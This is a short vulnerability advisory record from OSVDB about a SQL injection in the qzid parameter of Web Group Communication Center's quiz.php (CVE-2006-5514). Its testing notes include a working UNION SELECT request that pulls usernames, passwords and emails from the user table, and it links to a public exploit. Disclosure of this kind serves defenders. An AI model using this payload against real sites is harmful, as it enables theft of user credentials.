Web Group Communication Center quiz.php qzid Variable SQL Injection

2006-10-20T21:50:55
ID OSVDB:34013
Type osvdb
Reporter OSVDB
Modified 2006-10-20T21:50:55

Description

Manual Testing Notes

/quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,passwort,email,0,0,0,0,0,0,0,0%20from%20wgcc_user%20where%20userid=1++

userid=1 (change this)

References:

ISS X-Force ID: 29712
Generic Exploit URL: http://milw0rm.com/exploits/2604
CVE-2006-5514
Bugtraq ID: 20653